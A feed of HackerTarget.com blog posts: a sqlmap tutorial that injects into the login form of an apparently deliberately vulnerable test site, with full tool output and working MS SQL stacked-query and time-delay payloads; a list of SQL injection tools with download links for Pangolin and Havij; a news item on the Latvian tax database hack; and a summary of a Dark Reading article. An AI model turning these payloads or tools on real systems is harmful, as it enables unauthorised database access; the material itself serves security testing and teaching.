sql injection – HackerTarget.com

sqlmap POST request injection

the admin — Thu, 24 May 2012 10:03:15 +0000

In the past using sqlmap to perform POST request based SQL injections has always been hit and miss (more often a miss). However I have recently had to revisit this feature and have found it be to much improved. Both in ease of use and accuracy.

This is a quick step by step guide to getting it work, we are using Burp Proxy (Free Version) to intercept the post request.

To perform the POST request sql injections you will need your own installation of SQLmap. To install SQLMap use our SQLmap tutorial.

1. Browse to target site http://testasp.vulnweb.com/Login.asp
2. Configure Burp proxy, point browser Burp (127.0.0.1:8080) with Burp set to intercept in the proxy tab.
3. Click on the submit button on the login form
4. Burp catches the POST request and waits

5. Copy the POST request to a text file, I have called it search-test.txt and placed it in the sqlmap directory
6. Run sqlmap as shown below; the option -r tells sqlmap to read the search-test.txt file to get the information to attack in the POST request. -p is the parameter we are attacking.

./sqlmap.py -r search-test.txt -p tfUPass

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 13:26:52

[13:26:52] [INFO] parsing HTTP request from 'search-test.txt'
[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the GET
[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the Cookie
[13:26:52] [INFO] using '/home/testuser/sqlmap/output/testasp.vulnweb.com/session' as session file
[13:26:52] [INFO] resuming injection data from session file
[13:26:52] [WARNING] there is an injection in POST parameter 'tfUName' but you did not provided it this time
[13:26:52] [INFO] testing connection to the target url
[13:26:53] [INFO] testing if the url is stable, wait a few seconds
[13:26:55] [INFO] url is stable
[13:26:55] [WARNING] heuristic test shows that POST parameter 'tfUPass' might not be injectable
[13:26:55] [INFO] testing sql injection on POST parameter 'tfUPass'
[13:26:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:27:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:27:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:27:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:27:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:27:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:27:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:27:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:27:30] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[13:27:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:27:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:27:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:27:42] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[13:27:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:27:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:27:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
sqlmap got a 302 redirect to /Search.asp - What target address do you want to use from now on? http://testasp.vulnweb.com:80/Login.asp (default) or provide another target address based also on the redirection got from the application

>
[13:27:58] [INFO] target url appears to be UNION injectable with 2 columns
POST parameter 'tfUPass' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 68 HTTP(s) requests:
---
Place: POST
Parameter: tfUPass
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: tfUName=test&tfUPass=test'; WAITFOR DELAY '0:0:5';-- AND 'mPfC'='mPfC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tfUName=test&tfUPass=test' WAITFOR DELAY '0:0:5'-- AND 'wpkc'='wpkc
---

[13:28:08] [INFO] testing MySQL
[13:28:09] [WARNING] the back-end DBMS is not MySQL
[13:28:09] [INFO] testing Oracle
[13:28:10] [WARNING] the back-end DBMS is not Oracle
[13:28:10] [INFO] testing PostgreSQL
[13:28:10] [WARNING] the back-end DBMS is not PostgreSQL
[13:28:10] [INFO] testing Microsoft SQL Server
[13:28:16] [INFO] confirming Microsoft SQL Server
[13:28:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[13:28:28] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 42 times
[13:28:28] [INFO] Fetched data logged to text files under '/home/testuser/sqlmap/output/testasp.vulnweb.com'

[*] shutting down at: 13:28:28

Conclusion

It is that easy, the sqlmap project continues to push the boundaries when it comes to automated sql injection exploitation and discovery.

SQL injection continues to be a favourite target of attackers

Learn more.

sql injection tutorial

Next level testing with advanced Security Vulnerability Scanners.

Trusted tools. Hosted for easy access.

Use cases & more info

The post sqlmap POST request injection appeared first on HackerTarget.com.

SQL Injection Scanner List

the admin — Fri, 22 Jul 2011 00:02:14 +0000

A few of the wide range of SQL Injection scanning tools available from detection to automated exploitation and shells on a plate.

Sqlninja ( http://sqlninja.sourceforge.net/ )
Supports only Microsoft SQL Server.

sqlmap ( http://sqlmap.org/ )
Full support: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.
Partial support for: Microsoft Access, DB2, Informix, Sybase and Interbase.

Pangolin 3.2.3 free edition ( http://down3.nosec.org/pangolin_free_edition_3.2.3.1105.zip )
Your web applications using Access,DB2,Informix,Microsoft SQL Server 2000,Microsoft SQL Server 2005,Microsoft SQL Server 2008,MySQL,Oracle,PostgreSQL,Sqlite3,Sybase.
Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass firewall setting, Injection Digger, Data dumper, etc.

Havij v1.14 Advanced SQL Injection – free version ( http://www.itsecteam.com/files/havij/Havij1.14Free.rar )

The post SQL Injection Scanner List appeared first on HackerTarget.com.

When Neo Hacked the Latvian SRS Database

the admin — Sat, 27 Feb 2010 06:09:38 +0000

Movie plots cross into real life in Latvia where a significant security breach has occurred in the hacking of the Latvian SRS Databse. A group of hackers has stirred the nation after hacking into the countries taxation web site and revealing details of the powerful political elites wages and bonuses. One of the hackers used the name Neo, and has explained his motivations and reasons for the attack to a Latvian current affairs program.

From the Matrix:
Trinity: Hello Neo.
Neo:How do you know that name
Trinity: I know a lot about you
Neo: Who are you?
Trinity: My name's Trinity
Neo: Trinity...THE Trinity? The one who hacked the IRS D-Base?
Trinity: That was a long time ago
Neo: Jesus
Trinity: What?
Neo: I just thought...you were a guy
Trinity: Most guys do

To the horror of Latvia’s political establishment, a mysterious group of computer hackers is threatening to expose the incomes of top officials after stealing millions of government tax records.

The group, calling itself the People’s Army of the Fourth Awakening, claimed to have downloaded more than 7.5 million documents, including VAT receipts and income tax returns, from the State Revenue Service
(SRS) after exploiting a security loophole on its website.

One hacker used the name Neo, in apparent tribute to the hero of The Matrix science-fiction films, in which a vast system for enslaving humanity is exposed. He or she claimed that the documents revealed the
extent of official hypocrisy over belt-tightening reforms introduced as Latvia’s economy reeled under the impact of the global economic crisis. “The purpose of the group is to unmask those who gutted the country,”
Neo told the Latvian television current affairs programme Kas Notiek Latvija in an interview posted on its website.

Neo has been hailed as a digital Robin Hood by disgruntled Latvians after posting details from the documents on the internet to contrast the earnings of top officials with cuts experienced by other workers.

Reuters - Latvia web hacker nabbed after baring officals pay

The post When Neo Hacked the Latvian SRS Database appeared first on HackerTarget.com.

SQL Injection Demystified

the admin — Mon, 24 Aug 2009 09:35:27 +0000

Darkreading has a great article up on SQL Injection. This form of attack has been around for a long time, and happens because of poor dynamic website coding practices. A simple SQL injection vulnerability can often be exploited to gain full access to the database and / or full control of the database server.

Several high-profile hacks over the past year including;

Heartland Payment Systems
Hannaford Bros.
7-11

All have had one thing in common: they were launched with a SQL injection attack.

Cross-site scripting (XSS) had been the king of Web attack techniques for some time, and for good reason -- the ability to steal user credentials, hijack active Web sessions and take action on behalf of a user without their knowledge is particularly nasty. But the classic SQL injection attack has regained the lead as the most popular of Web attacks. Most of all reported Web breaches the first half of this year, according to the new Web Hacking Incidents Database (WHID) report, were conducted via SQL injection. And SQL injection is one of the most common vulnerabilities in Web applications today.

To find more about SQL injection, we have a tutorial to follow which includes explanation and examples. See: SQL Injection Tutorial

Link to article referenced above

Dark Reading - SQL Injection Demystified

The post SQL Injection Demystified appeared first on HackerTarget.com.